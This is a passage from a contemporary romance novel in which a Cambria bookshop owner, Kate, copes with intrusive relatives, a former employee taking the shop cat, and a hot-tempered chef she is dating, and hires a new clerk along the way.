They walked back hand in hand, Kate feeling an excitement just under her skin. She hadn't expected this, whatever this was. Especially after the restaurant debacle, she hadn't expected to feel this.
By the time they got back to his truck, it was later than she'd expected. They'd been on the beach, talking, getting to know each other, for much longer than it had seemed.
"I guess I'd better take you home," he said, holding her in his arms beside the Silverado.
"I guess you'd better." She rested her head in the hollow of his shoulder. "I'd invite you back to my house, but my father and stepmother are there."
"Mm hmm," he murmured.
"There's your place," she said.
He looked down at her. "Next time," he said. "Or the time after that. Soon."
She nodded. "All right."
He opened the door for her and tucked her inside. Then he drove her home, to the place where she'd have to deal with the reality of her father and Angela.
They said goodnight at the door. She could see in his face that he didn't want to leave her, didn't want the evening to end with a proper, chaste goodbye. But this was new, this was something different. Jackson wasn't going to treat her like the others, and so she watched him drive off, a goofy grin on her face as she went inside.
She had expected to find her father and Angela watching TV or eating her food. She'd expected to find her belongings chewed and their luggage and clothing all over the living room.
She hadn't expected to find that they'd locked her out of her room.
Kate's part of the tiny house had just one bedroom, and they were in it, with the door locked behind them. The only bathroom was in there, too. At first, she thought she must be misunderstanding the situation. Were they even in there? Had they accidentally locked the door before they'd gone out somewhere? But the pink Cadillac was still in the driveway, and she could hear Jazzy snuffling at other side of the bedroom door.
For a minute, she just stood there in exasperation. They took her room. They were sleeping in her bed. She'd known they would try to manipulate her into giving them the bedroom. But it was one thing to know that, and another to come home and find that they'd taken over without discussion, intentionally locking her out so she couldn't get her things, couldn't even pee, for Christ's sake. And she really did have to pee.
She weighed her options. She knew she should bang on the door, demand that they clear out, and take back her bed. But the evening had been so lovely—the part on the beach with Jackson, not the part earlier, when her father and Angela had arrived unannounced. She didn't want to end the night with a family blowout, with yelling and accusations and the laying on of guilt.
Kate put her ear against the door and could hear her father snoring thunderously.
When she'd come in, she noticed that the light was still on downstairs in Gen's place. She checked the clock on the stove and saw that it wasn't quite midnight. She grabbed her purse, went down the outside stairway, and knocked gently on Gen's door.
Gen opened up wearing a leopard print robe and pink fuzzy slippers. Her face was eager as she greeted Kate. "Hey! How was the date?"
"Good. Really good. I need to use your bathroom."
"Okay. What's wrong with yours?"
"You wouldn't believe it."
She stood back to let Kate in. "Is it a good story?"
"It's a story, anyway. Let me pee first. Then the story."
A few minutes later, when Kate and Gen were sitting cross-legged on Gen's bed like a couple of teenagers, Kate's shoes kicked off and tossed aside, Gen said, "Okay, so what's going on?"
"My father and Angela locked me out of my bedroom."
Gen's eyes grew wide. "They _what?_ "
"Not only are they staying with me when I explicitly told them they weren't invited, they waited until I was gone on my date, and then they moved into my room and locked me out, so I can't even get my pajamas or use my own bathroom."
" _No shit_." Gen seemed to be in awe of their audacity. There might even have been a hint of admiration in her voice.
"I don't know what to do. Do I pound on the door, get them out of there, and send them to a Motel 6, or what?"
Gen nodded. "Yeah, you probably should."
"Yes. Look, honey, I know he's your dad, and there are some... _feelings_ there. But he takes advantage of you. It's what he does. He doesn't call for months on end, and then when he does, it's because he needs money, or he needs a favor, or... "
"Or he wants to stay in my house and take over my bedroom."
Gen reached out and squeezed Kate's arm. "Yes."
Kate rubbed at her eyes. "I know. You're right. But I can't really deal with this tonight."
"Stressful first date?" Gen asked in sympathy.
"Yes and no. Yes, because first dates are always stressful, and also because Jackson abandoned me at the restaurant. But also no, because then there was the beach, and talking, and kissing. And cupcakes."
Gen adjusted her position and leaned back into a pile of pillows, getting comfortable. "Ooh. Kissing."
"Oh, God, yes, the kissing. Jackson is... he's just... " Nothing she could say to Gen would adequately describe the kissing.
"I see," Gen said.
"He's all blustery and angry and intimidating, and I think he threw some glasses in the kitchen. But he _listens_ , and he's so... just so... " Kate held out her arms to indicate the enormity of what Jackson was.
"Oh, sweetie. You're gone."
"I know!" Kate flopped down on the bed and pulled a pillow over her head.
"He threw glasses in the kitchen?"
Kate peeked out from under the pillow. "Maybe. It might have been Max."
"Wait, wait." Gen waved her hands in the air. "Back up. Tell me what happened at the restaurant."
Kate told her, and Gen chuckled, shaking her head. "I've always heard stories about that Jackson Graham temper. Jeez."
"So I ate his cupcake."
"As well you should have, sweetie," Gen cooed. "As well you should have."
"Can I sleep here tonight?" Kate said.
Gen sighed. "Of course you can. But tomorrow, you have to do something about this." She pointed one finger at the ceiling.
"I will. I promise I will."
She fully intended to do something about the father situation the next morning, but she couldn't, because she woke up late, and when she went upstairs at a little after eight a.m., her father and Angela were gone. A note pinned to the refrigerator with a magnet said, _Gone out for breakfast. You need to buy groceries!!! See you when you get home from work. Dad._
Kate sighed and crumpled up the note. Apparently her hostess skills were lacking. When someone turned up on your doorstep uninvited and took over your bedroom, you were supposed to have fresh croissants and a fruit platter ready for them when they woke up in the morning. Maybe some mimosas.
She peeked into her bedroom. The bed hadn't been made, and the sheets and blankets were in a tangle. An open suitcase lay on the floor, its contents scattered part in, part out of the case. In the bathroom, wet towels lay on the floor in puddles of water from the shower.
At least the dog wasn't here. Kate pictured it in Angela's purse, its fuzzy head peeking out while Angela and Kate's father ate eggs Benedict at The Sandpiper.
Kate checked the clock. She had two hours until Swept Away opened at ten a.m. She knew she should gather up their things, stuff them in the suitcase, put the suitcase on the front doorstep, and lock the door when she left for work. She could leave a note on top with the names of some excellent local hotels.
She seriously considered it for a moment, but the thought of the guilt her father would lay on her for months afterward stopped her. At least they were gone right now, and she could take a shower and get ready for work.
In the shower, she discovered that someone—likely Angela—had used the last of her shampoo.
At the shop that morning, Kate opened for the day. She put out the sandwich board—today's special was biographies, twenty percent off—put out some cat kibble and fresh water for Jane Austen, and cleaned Jane's litter box. Then she checked her emails. Amid the spam, the book order information, and the marketing emails from publishers, she found a message from Cassidy McLean. She clicked it open.
_Dear Kate,_
_I'd love to appear at your Art Walk event. Cambria is so quaint and lovely! I'll bring Samantha with me, she's always a hit at get-togethers. Let's chat on the phone to pin down the details._
_Kisses, Cass_
Samantha? Who was Samantha? Kate Googled Cassidy McLean with the name Samantha, wondering if perhaps she was a partner at the wildlife refuge. It turned out that Samantha was a ring-tailed lemur.
_Hmm. Okay. That's something the souvenir shop down the street won't have._
Kate returned the email, confirming that Cassidy and Samantha would appear at the Art Walk event and suggesting a time for them to discuss it on the phone. Then she Googled ring-tailed lemurs to have some idea what to expect.
While she was doing that, the bell above the door rang, and Althea came into the shop with a cat carrier.
"Althea." Kate greeted her coolly.
"Kate. I just came by to pick up Jane Austen."
Kate stood there mutely. She couldn't possibly have heard correctly.
"Excuse me?"
"Jane Austen. I came to get her. I'd have taken her with me the day I was _forced out of my job_ , but I had to locate a cat carrier. As you can see, I have one. Jane! Jane Austen! Come here, girl." Althea hunched down toward the floor and started hunting around for the cat.
"What makes you think you can take my cat?" Kate demanded.
"Your cat? There must be some mistake," Althea said, her heavily lipsticked mouth arranged in a pout. "Jane Austen is, and has always been, _my_ cat."
Kate took a moment to think about whether this was true. Two years ago, Jane Austen had walked into the store on a day when Kate had left the front door open to let in the cool ocean breeze. She'd made herself comfortable, climbing onto one of the easy chairs Kate provided for customers who wanted to sit and read. Jane Austen had settled in for a nap, and Kate hadn't had the heart to move her. When she'd returned the next day, and the next, Kate had bought her a bag of kibble, food and water bowls, and a litter box. She'd lived here ever since.
"She's not yours," Kate protested. "She lives in the store. She's the Swept Away cat!"
Althea straightened and crossed her arms defiantly. "Who usually puts out her food and water? Who usually cleans her litter box?"
"We both do that!"
"Hmm. Seems to me that in the last week I worked for you, I did those chores five times out of seven. _Five times_ out of _seven!_ So if anyone has a claim to this cat, it's me. Now, where is that cat? Jane Austen! Come on, sweetie, Mommy's going to take you home!"
Kate felt helpless. It was true that Althea probably fed the cat more often than Kate did. It was also true that Jane Austen had never lived at either one of their homes—she'd always been the shop's cat. Kate didn't have a bill of sale or papers of adoption to prove Jane Austen was hers. She'd just always thought of it that way.
"I'm the one who took her to get spayed!" Kate offered desperately. "I'm the one who takes her to get her vaccinations!"
"Humph." Althea looked at her with the scowl again. "You did those things because _I_ told you they needed to be done. Why, if I hadn't badgered you about it, there's no telling _what_ would have become of poor Jane! She'd probably have had two litters by now. Not to mention a nasty case of distemper!"
Althea located Jane Austen under a table and bent down to pick her up. "There you are!" Kate was trying to figure out what to do, how to stop Althea, whether it would be prudent or effective to block the door with her body, when Jackson came in the front door of the shop.
"Hey, Kate." He had a sexy smile on his face as he came in and approached her. "I just thought I'd stop by on my way to work and tell you... "
"There!" Althea said in triumph after forcing the yowling, protesting cat into the carrier and snapping the door shut.
"What's going on here?" Jackson asked.
"I'm taking my cat," Althea announced.
"She's taking _my_ cat," Kate said miserably. "She quit, and she's striking out at me by _stealing my cat_."
"If you don't like it, call the police!" Althea said, picking up Jane Austen's carrier and facing Kate in defiance. "You can explain to them how she's your cat even though she _loves me more!_ "
"Oh, come on," Kate protested. "That's just... "
Althea headed toward the door, and Jackson took a couple of steps and stood in front of her, blocking her way. "Put down the cat," he said.
_Oh, God_. The last thing Kate needed was Jackson blowing a gasket and kicking an old lady's ass in the middle of her store. "Jackson... " she began.
"If you'll just step aside," Althea said.
"I'm asking you to put down the cat," Jackson said again, his voice calm—for the moment.
Kate could see this all heading downhill faster than an Olympic skier. Jackson would yell. Althea would cry. They might engage in a struggle for the cat carrier, each with a hand on the handle, pulling, until poor Jane Austen either got shaken violently inside the carrier or crashed to the floor.
Althea's face was turning red in indignation. "Jackson Graham, don't you bully me. This is my cat, and I'm leaving! Get out of my way!" Her shoulders were squared and her face was set in an expression of grim determination.
Jackson was gearing up for battle—Kate could see it in his face, as well. He'd sort of puffed up, like certain animal species did when they wanted to appear bigger to a potential rival. Which was ridiculous, since Jackson already was a foot taller than Althea.
"Althea. I told you to put down the cat. Don't make me take that carrier away from you." His voice was so intimidating, Kate could practically see his restaurant staff quaking in their kitchen clogs.
"Now, just hold on," Kate said.
They didn't hear her. Althea and Jackson were speaking over each other as the situation escalated.
"I'm leaving with this cat, and there's nothing you can... "
"I'd like to see you get through me, you decrepit old... "
"Stop!" Kate placed herself between Althea and Jackson. She faced Jackson and put her hands on his chest in a gesture meant to calm him. "Jackson, I want you to stop," she said. Without turning around, she said, "Althea, I want you to go out the back door. Please do it. Right now."
"I'm taking Jane Austen," Althea said stubbornly.
"Take her. Just go."
"But my car... "
"Althea, for God's sake."
The older woman must have realized she was pushing things too far, because she hurried out the back door with the cat carrier handle clutched in her fist. As she went, she defiantly looked at Kate, and then grabbed the bag of cat kibble from the counter.
Kate continued to stand with her open hands resting on Jackson's chest. He was breathing fast, his face still reddened by anger. She peered up into his face, worried that he might explode and start throwing books. At least they wouldn't break the way the stemware at the restaurant had.
"Jackson?" she tried tentatively.
"Yeah, what?"
"Take a deep breath."
He did.
"Okay?" she asked.
"You sure?"
She lowered her hands and took a step back. "You can't just get into fights with old ladies."
"I can't believe you let her take your cat." His voice was tight, angry.
"I can deal with that later."
"Why did you let her take your cat?"
"Jackson." She took his hand and led him over to the two easy chairs she had set up in her reading nook. "Listen. I appreciate that you were standing up for me, but you can't yell at old ladies in my store. Or anywhere, really."
He took another deep breath and looked at the floor. "Yeah. Okay. I know. But somebody had to do something. You were just going to let her go. You did just let her go."
"What was I supposed to do? Look. I want to see you again. There's... something... between us. I want to find out what that is. But you can't make a big, angry scene every time we're together. That just won't work for me." She put a hand on his arm.
He stretched his neck in a calming-down gesture. "Last night," he said. "You stood up to me. You told me I was an asshole at the restaurant. And I was—you were right. People don't usually stand up to me, but you did. Why couldn't you do that with Althea?"
It was a good question. Why _couldn't_ she do that with Althea? _And why can't I do that with my father?_
"I guess we both have things to work on," she said.
# 14
Jackson, Daniel, Ryan, and Will played in a recreational baseball league every fall, and in an effort not to embarrass themselves when the season started, they tried to make regular visits to the batting cages in summer, just so they wouldn't look like idiots in September. They had to go all the way down to San Luis Obispo to the nearest facility, but it seemed like a reasonable price to pay to avoid humiliation.
The day after the cat incident was hot and dry, the temperature higher than what they usually expected here on the Central Coast. Ryan was visibly sweating through his T-shirt as he lined up at the plate, waiting for the pitching machine to hurl balls at him.
"So, what's the status with Kate?" Ryan asked Jackson as he swung and missed.
"Morning date next Thursday. Breakfast and a hike. I'd like to see her sooner than that, but it's the only time I can get off from the restaurant when she's not at the shop."
Ryan nodded. "Okay, a beach hike. That can be good. Romantic. Crashing waves and all that."
"Just don't bitch about the pancakes," Will added.
"I know, I know."
Ryan made solid contact with the ball for a decent hit, and Daniel called encouragement to him. "That's the way, Ry! You got it!"
"So." Daniel brought the subject back to Kate. "I guess things are moving along, then?"
Jackson shrugged. "More or less. But she let me know she's not on board with my angry Neanderthal routine."
"Uh-oh," Will said. "Is that still about the first date incident, or did something else happen?"
Jackson grimly watched Ryan hitting some pitches and missing others, and didn't answer.
"Something else happened," Daniel said. "I'm gathering."
Jackson sighed and looked at them. "I came into her shop yesterday morning, and Althea Morgan—the old biddy who used to work there, until she quit—was stealing Kate's cat."
"Jane Austen," Will said.
"Right. She just came in with a goddamned cat carrier, loaded up the cat, and took it." The muscles bunched up in his jaw, tension building just from the memory.
"Jackson, you're up," Ryan said as he vacated his spot in the cage.
Jackson hefted his bat and stepped up to the plate. The pitching machine hurled a ball at him much faster than he remembered from the last time he'd come here. He swung hard and missed.
"So you pulled out your club and your big rock and went after Althea?" Will asked.
Jackson swung and hit a hard ground ball. "Nothing that dramatic. But I did tell her to put down the damned cat and walk away slowly."
"Uh-oh," Ryan said.
Two more strikes, and then a solid fly ball to what would have been left field. "Yeah," Jackson said.
"So you threw down with an old lady to protect Kate's honor?" Ryan said.
Swing, miss.
"Something like that. But Kate didn't see it that way." The bat cracked against the ball. Foul ball to the right. "Told Althea to take the cat and run out the back door, like she thought I was going to go postal on her. Then she gave me a speech about how if we're going to do this thing—which she says she wants to do—then I've got to tone it down. Be civilized. Stop intimidating senior citizens."
Pop fly to the imaginary shortstop. That one would have been an out.
Jackson's turn came to an end and Will took his place.
"It's not an unreasonable request," Daniel said.
"No, I guess not." The hitting practice had taken some of the tension out of his shoulders, but not all of it. He stretched.
"Then what's got you all worked up?" Ryan asked.
Jackson turned to him. "She took the goddamned cat, and Kate didn't do anything about it. She just stood there. Her father and stepmother—who Kate can't stand, by the way—moved into her house after Kate told them no, they couldn't come. I mean, what is that? Why does she let people walk all over her? She's so... But then she just... "
Will, the power hitter among them, smacked a hard fly to left. "And you want to protect her," he said.
"Well... Yeah."
"And she doesn't want to be protected." Smack. He hit a ball that would have been over the damned fence.
"No, she doesn't. At least, not by me." Jesus, Will could hit. Jackson felt thankful they were on the same team. "But she's not some milquetoast. I get out of line, she tells me to can it in no uncertain terms."
"Huh," Daniel said. "I'm seeing a certain complement of personalities here."
"Huh," Jackson said.
Kate had to hire somebody. She could handle the shop alone, she supposed, but she didn't relish the idea of working seven days a week, and she also didn't want to have to manage the upcoming Art Walk without a little help. She couldn't draft any of her friends as temporary employees, because they all had their own jobs or their own businesses to run. A couple of days after Althea's departure, she'd posted a Help Wanted ad online and also on a couple of bulletin boards in town. She'd put a sign in her window, and she'd also been asking people if they knew anyone who needed a part-time job.
Kate was looking wistfully at Jane Austen's bed, vacant but covered in cat hair, when a young man with black dyed hair, two sleeves of tattoos, a pierced eyebrow, and what appeared to be eyeliner came into the store. The guy, who looked to be in his early twenties, was dressed all in black, and had hair that swooped down to cover one eye.
"May I help you?" Kate asked. She'd seen the kid around town here and there. She seemed to recall that he was the son of one of the ladies who came to the monthly book club Kate sponsored.
"Um, yeah." The kid shifted from one foot to another. "I came about the job. My mom said you were looking for somebody, and she sent me over."
"Your mother is Beverly MacPherson."
"Yeah, that's her."
Kate held out her hand. "Kate Bennet."
He shook with her. His grip was surprisingly firm and businesslike. "Fury McPherson."
Kate's eyebrows rose. "Excuse me? Your mother said your name was Brandon."
His head bobbed up and down. "It used to be."
"So, is Fury some kind of nickname, then?"
"No, it's my actual name. I had it changed." He pulled out his wallet, fished his driver's license from the pocket, and showed it to her.
"Huh," Kate said. She handed the license back to him. Beverly hadn't mentioned the name change, probably hoping that if she failed to acknowledge it, then it might not be true.
Kate looked the kid over. He was decidedly out of place in Cambria, where people tended toward conservative clothing—unless they were going the Earth-loving, granola-eating direction of peasant skirts and Birkenstocks. Kate had to imagine that Fury—or Brandon, back then—had been lonely in high school, forming his own little clique of one. Sure, Rose favored tattoos and facial piercings, but she hadn't grown up here.
Kate's hopes were not high when she said, "Okay, tell me a little bit about why you'd be a good fit for Swept Away."
He stuffed his hands into the pockets of his black skinny jeans. "Well, I like books. I read a lot. I'm taking classes at the community college down in SLO, but a couple of them are online, so I'd be available whenever you need me. Just about. Except for Monday and Wednesday mornings."
They discussed his job history—he was a busboy at a local burger joint, and he'd spent time pumping gas at the Shell station on Main Street—and his references. She'd nodded, not paying a great deal of attention, when he'd listed the manager of the burger joint and one of his community college teachers. But she perked up considerably when he gave her the name of his Scoutmaster.
"As in Boy Scouts of America?" she said.
He looked embarrassed. "My mom got me into it when I was this high." He held his hand out at about his waist. "Mostly, it was pretty cool. My Eagle Scout project was kinda awesome."
She blinked at him. "You're an Eagle Scout?"
He shrugged.
"You had an Eagle Scout project." She was getting it all straight in her head.
"You kinda need one to become an Eagle Scout. I organized a group to clean up a hiking trail in Big Sur. We built a bench."
"A bench."
"You know, for hikers. So they can sit."
When they were in the middle of their conversation, an older woman—a tourist, based on the Cambria tote bag she was carrying—came into the store and started browsing one of the bookshelves.
"Let's see how you do," Kate said to the young man.
"You mean now?" He looked nervous.
"Sure. Go ahead. Help that customer." She gestured toward the woman.
He wandered casually over to the woman. "Welcome to Swept Away," he said. "Can I help you with something?"
The woman looked up, blanched at his appearance, and then stammered. "I... uh... I was... I was just looking for a book to read. Something light, for my vacation."
"Right, right." His head bobbed again. "Any particular genre?"
"Hmm." She thought. "Maybe romance."
"Okay. You've probably read all of the Nora Roberts."
"Actually, no," the woman said. "I've never read any of her books."
His eyebrows—the pierced and the unpierced—shot upward. The little sterling silver ring above his right eye bounced. "Dude. You like romance but you've never read _Nora_? How is that even possible?"
The woman looked flustered. "Well, I... "
"Don't worry, we'll fix you up," he said. He scanned the romance shelf until he found the sizable Nora Roberts section.
He looked at the woman. "Romance plus murder, or just romance?"
"Just romance."
"High conflict or low conflict?"
"Um." She considered this. "Low, I guess."
He nodded. "Humor or no humor?"
"Oh, humor, for sure."
He plucked a book off the shelf. "Here ya go. It's the first in a three-part series, so if you like it, there's more where that came from."
The customer left the store smiling, with a newly purchased book in her tote bag. When she was gone, Kate asked him, "You read romance?"
"Ugh, no." He gave an exaggerated shudder.
"Then how do you know so much about it?"
"My mom reads _everything_ ," he said. "And then she talks about it. Endlessly."
Kate chuckled. From her experience at the book club with Beverly McPherson, that description was right on target.
"One thing," she said.
"What's that?"
"It's probably best not to call the elderly female customers 'Dude.' "
# 15
Kate had made progress in some areas of her life, and less progress in others, by the morning of her second date with Jackson. She'd hired Fury and had started to train him. She'd talked on the phone with Cassidy McLean and confirmed her—and her lemur—for the Art Walk. But she'd still failed to get her father and Angela out of her house. It had been one week and three days, and they were still ensconced in her bedroom with their snowdrifts of clothing everywhere and their yappy little dog destroying her things: one shoe, a table leg, two books, and a TV remote, at last count.
As she was getting ready for her morning hiking date—jeans, a cute scoop-necked T-shirt, and sneakers—she tried again to get some kind of read on what her father's plans were. And when he and Angela were likely to leave.
"So," she said, tying on her sneakers and trying to sound casual. "You haven't really mentioned how long you're planning to stay."
"Oh," Thomas said offhandedly, looking up from his newspaper. "We're playing it by ear. It's so nice to finally spend some time with you. Why rush that?"
"Why indeed," she murmured. Then, louder: "It's just, I don't want to impose on Gen any longer than I have to. Have you made any progress finding space at a B&B? I can help with that, if you like."
He shook his head sadly. "They're all so full in the summer. Plus, so few of them take dogs."
She didn't think that was true—it seemed to her that a wide variety of accommodations in town accepted pets—but she didn't say anything.
Angela came bustling in from outside, where she'd been walking Jazzy. She unclipped the dog's leash, planted her hands on her hips, and said, "Is _that_ how you're going to do your makeup?"
"It's hiking. We're going hiking. There'll be sweating, and... It didn't seem like a lot of makeup would be required."
"Good lord," Angela said, scowling. "I can see I'm going to have to do something with you." She grabbed Kate's arm and hauled her toward the bathroom.
Twenty minutes later, Kate was sitting across the table from Jackson at a café in town, a croissant and a latte in front of her, her face done up in more makeup than one would expect to wear for a role on Broadway. Since Kate didn't usually wear much makeup—a little concealer, mascara and lip gloss, and she generally called it done—the contrast was striking.
"Wow," Jackson had said when they'd met outside the café. "You know we're just hiking, right?"
"I know, I know." She glared at him. "Angela sells Mary Kay."
Jackson looked bewildered. "And Mary Kay is... "
"Makeup!" Kate had waved both hands in front of her face, drawing attention to Exhibit A. "It's... all this! Ugh. I want that woman out of my house!"
Jackson had chuckled. "It's not that you don't look nice. It's just... a little much for hiking."
"Gee, you think?" Kate had retorted.
Now, Kate was enjoying a warm pastry and a creamy latte while Jackson dug into a thick slice of quiche that he pronounced acceptable. The café was busy with locals at this time of the morning, the tourists mostly still in their plush hotel beds or partaking of the breakfast buffet at the lodge up the hill. It was still early, but the bright morning sunlight poured in through the front window. The café, it's décor rustic with dark wood surfaces and mismatched chairs, smelled of coffee and fresh bread.
By the second date, it was no longer possible to avoid discussing one's ex-husband. So Kate was filling Jackson in on the particulars: She and Marcus had been married six years, separated after five. The divorce had become final two and a half years after he and Kate had moved to Cambria. Cambria had been part of the problem—Marcus had hated it here, feeling that he was stuck in the middle of nowhere. When they had split, he'd gone back to Los Angeles as fast as his car would carry him.
"I don't want to dwell on it, because dwelling on it makes me sound weak and pathetic," Kate said stoically as she popped a piece of croissant into her mouth. "But if we're going to be seeing each other, you deserve to know the basics. Marcus and I got married when I was just out of grad school. That's where I met him—at UCLA. He was engineering, I was English. Anyway. He cheated. A lot. I'd pick up on clues and ask him what was going on, and he'd spin things to make it look like I was so paranoid or emotionally fragile that he was the hero for putting up with me."
"He made you doubt yourself."
Jackson looked down at his plate, his face showing that Jackson anger that was becoming so familiar to Kate. "I met him a few times right after I started working at Neptune. Seemed like an asshole," Jackson said. "Guys like that give all of us a bad name. I'd like to kick his ass."
"So would I," Kate said.
"But you left him eventually," Jackson said. "So that's good."
She shook her head and sipped at her latte. "I wish I had. I wish I'd shown that kind of sense. He left me. For somebody named Tiffany. Probably one in a long line of Tiffanys. It was only then that I could start to see clearly what he'd done to me. Emotionally, I mean. How he'd manipulated me." She shuddered. "I'm thankful we never had kids. At least I don't have to see him to deal with child support and weekend visits, and... " She gestured with her hand to indicate all the myriad ways parents had to remain involved with each other. "Tiffany would be my kid's stepmother. Or someone like Tiffany. God forbid."
"What if he hadn't been a cheating asshole? Would you have had kids?"
She considered the question carefully before answering. "Not at first. I was very involved in my career for those first years. The novel, my teaching job. I thought I wanted tenure, wanted a life in academia. I was very involved in trying to be somebody. I don't know if kids would have fit into that."
"And now?"
She shrugged. "Now I'm building a different kind of life. A quieter one. And with my mother gone, I'm starting to see how important family really is."
They decided to hike a three-mile trail that started at the beach in San Simeon and curved inward among the grassy hills and the eucalyptus groves. This time of year—the dry season—the hills were golden, with tall grasses that rippled in the breeze. During the rainy season—or, as rainy as it got here, which wasn't very—the grass turned a deep green that covered the rolling hills in a rich emerald. This early in the morning, the temperature was pleasant and cool. Already, a number of people, mostly locals, walked the trails alone or with their dogs.
As they walked, Kate was reminded again why she'd moved here. The beach, the pines, the vast stretches of unspoiled land dotted with grazing cows. This was so different from L.A., which she had once thought to be the center of the universe. Now, after living here for five years, she felt suffocated whenever she returned to the urban sprawl. Concrete, crowds, rivers of cars idling on the freeways, waiting to go nowhere. All signs of the natural world vanquished, even on the beaches, which had been reduced to flat expanses of featureless sand. Her mother had given her a gift by coming here and leading Kate to follow her. It was a simpler life. A better one. A life with a sense of peace, of meaning.
"What are you thinking about?" Jackson asked as they walked among the trees, the ground crunching beneath their feet, the sound of the crashing waves behind them.
"This place," Kate answered, gesturing around her. "I still can't get over how beautiful it is here. You'd think that after five years, I'd have stopped noticing, stopped seeing it. But this... " She shook her head in wonder.
"You don't miss L.A.?" he asked, glancing back at her from his place ahead of her on the trail.
"Not a bit. Well," she amended, "sometimes I do when I want to shop at Nordstrom. But otherwise, no. I didn't understand it at first when my mother just picked up her whole life and moved here. I thought she was having some kind of late-midlife crisis, reacting to the whole mess with my dad. But I get it now. She knew what she was doing."
"Yeah." He nodded. "The Bay Area's different. Beautiful in its own right. I do miss it sometimes. The night life. The restaurant culture—it's exciting for a chef. When Gavin—my friend from culinary school—opened Neptune, I thought I'd come down here, put in a few years, then take my expertise and parlay into something in San Francisco. But once you're here, it's hard to leave." He looked around at the stunning beauty that surrounded them. "This is a lot to give up."
When the trail widened so that they no longer had to go single file, he walked beside her and reached out to hold her hand. His hand was big and warm around hers. She felt a tingle of joy at his touch.
They'd been walking for about a half-hour, a light sheen of sweat mixing with Kate's Mary Kay makeup, when a tall, blond woman wearing tight spandex workout shorts and a sport bra came toward them on the trail. She was wearing earbuds, and at first she didn't see them. Then she looked up, spotted Jackson, and smiled in surprise.
"Jackson!" She pulled the earbuds from her ears, came forward, went up on her tiptoes, and planted a kiss on Jackson's cheek.
"Melanie." Jackson looked uncomfortable. Kate took in the body language—Melanie and the way she positioned her sculpted hips and tilted her body toward him, Jackson and the way he'd become fidgety, the way he was leaning slightly away from her. "Uh... This is Kate Bennet. Have you two met?"
Melanie's eyes swept over Kate from head to toe and apparently found her lacking. "Not formally, but I've been into the bookstore a few times," she said.
"Lovely to see you again," Kate replied.
Melanie turned the considerable wattage of her attention back to Jackson.
"You never called me," she said to him, her voice a sinewy purr. "My number hasn't changed."
Jackson shot a glance at Kate. "Ah... This isn't really the best... "
Melanie looked at Kate and smirked. She stretched up toward Jackson's ear and whispered to him. Kate could just make out what she said: "When you're done with her... give me a call."
The admirably fit blond bimbo bounced up the trail, and Jackson faced Kate, apology and embarrassment in his expression. "Kate, I'm sorry about that."
Kate stood with her arms crossed over her chest, head cocked to one side, gazing at him. "Is this going to happen often? This running-into-women-you've-slept-with thing? Twice in two dates—that's a pretty impressive start."
He ran a hand through his hair. "I'd like to say no, but... it might."
"You've been busy," she said.
He walked to a nearby bench and sat down, looking uncomfortable. She sat beside him.
"I have kind of a history, I guess," he said. "Is that going to be something you can live with?"
Kate shrugged. "Well, I can't say that I enjoyed that encounter with Melanie. But I know about your 'history.' Word gets around."
He nodded. "I guess it does." He looked at her. "I want this to be different." His face was so open, so earnest, that she believed him.
"And that's why we didn't sleep together that first night? When you were teaching me to cook?"
"Yeah. Kate, I don't know where this is going to go, if it's going to go anywhere. But I do know that all of the sex, all of the casual two-weeks-and-then-move-on shit, it's not what I want anymore. I want to get to know you. I want you to get to know me. And then, I want this thing between us to succeed or fail based on something real."
The way he was looking at her, the honesty and yearning, tugged at her core. A wave of warmth ran through her. And oh, God, the irony. She found herself wanting him more than she'd wanted any man in longer than she could remember—precisely because he'd said he was not going to sleep with her. Or, really, it was more the way he'd said it. Either way, she needed to touch him, to taste him. She felt like her skin was on fire.
"Jackson... " She drew toward him. He hesitated, and then kissed her. And the world around them vanished as her body ignited. The desire was no longer something she felt; the desire was a living thing inside her. The kiss grew deeper, more urgent. Her arms wrapped around him, the warmth and strength of his back humming beneath her spread fingers.
He crushed her to him, his mouth on hers, and she felt light, small, alive in a way she could barely remember feeling before. He groaned, and she could feel the vibration of it through her body.
Gently, he put his hands on her shoulders and pushed her away.
"Kate. God." He pulled back from her and took a deep breath.
"We could go back to my house," she whispered. Then she remembered her father and Angela. "Or, no. Your apartment?" The hot, seething yearning made her forget how early it was in their relationship, how unwise it might be to jump into something, the things he'd said about wanting this to be different. She forgot everything but this. Everything but him. "Please."
He stood, backed away, put some distance between them. "I want to. God, you have no idea... But... "
"So, we're just going to ignore this thing we've got between us?" Her frustration put an edge into her voice. "We're just going to have nice, chaste dates? Maybe you can strum your guitar on the front porch swing while Aunt Bea brings us lemonade."
One side of his mouth quirked up. "You're teasing me."
"I'm not the one who's a tease."
He came back to sit beside her, and put his hands on her shoulders. "You matter, Kate. That's why this has to be different. Because you matter."
She softened, knowing he meant what he was saying, knowing she was more to him than all of the Lindseys and the Melanies and whoever else was lurking out there having been in Jackson's bed.
"How long?" she said.
"How long what?"
"How long do we have to wait in order to make this different than the others? To get to know each other? To ensure that when we do take that step, it's about more than just shallow sex? I mean, even though it would be _fantastic_ shallow sex."
The look on his face suggested that he was having trouble focusing because he was thinking about the fantastic shallow sex.
She could see him come back to the present. "Well, I hadn't really thought about putting a number on it."
"So, think about it now." Her pulse was coming back down to normal, but her mind was still foggy with the force of wanting him. She urged herself to get back on her game. "It'll work better for me if I know what we're dealing with."
He rubbed at his chin with his hand. "Five dates?"
"Yeah, why not?"
"That's still not exactly old-fashioned courting." She grinned.
"It's about four dates better than I usually do."
She got up from the bench and paced a bit, thinking. "Does the first one count?"
"The first one what?"
"The first night we spent time together. The cooking lesson. Does that count as the first date?"
He shook his head. "Nah. That wasn't a date. The Sandpiper was the first date."
"And that makes this the second, not the third."
"Right," he confirmed.
She went over to him and pressed her body against his, her hands resting on his hips. She grinned up at him.
"Think you're going to make it that long, big guy?"
"I'll make it," he said, his voice almost like a grunt.
She pressed a quick, light kiss to his lips. "We'll see."
# 16
"He's a man whore," Kate said. She was sitting with Gen, Rose, and Lacy at The Wild Orchid, a sushi place a block off Main Street, gesturing with a piece of California roll pinched between two chopsticks. "But can I use that to my benefit, have some much-needed fun? Get a little happy stress-relief? No, I cannot. Because he's got some ridiculous—but, yes, sweet—notion that I'm different from all the other women. I'm not! I like sex just as much as the other women!"
"And you haven't had it in a long time," Lacy said soothingly.
"So long!" Kate agreed. "After Marcus, I was so... so... " She searched for the word. "So _stunted_ emotionally that I didn't even want to. I couldn't even go there with anyone. Couldn't even feel _attracted_ most of the time, because... "
"We know, honey," Rose said, rubbing Kate's upper arm.
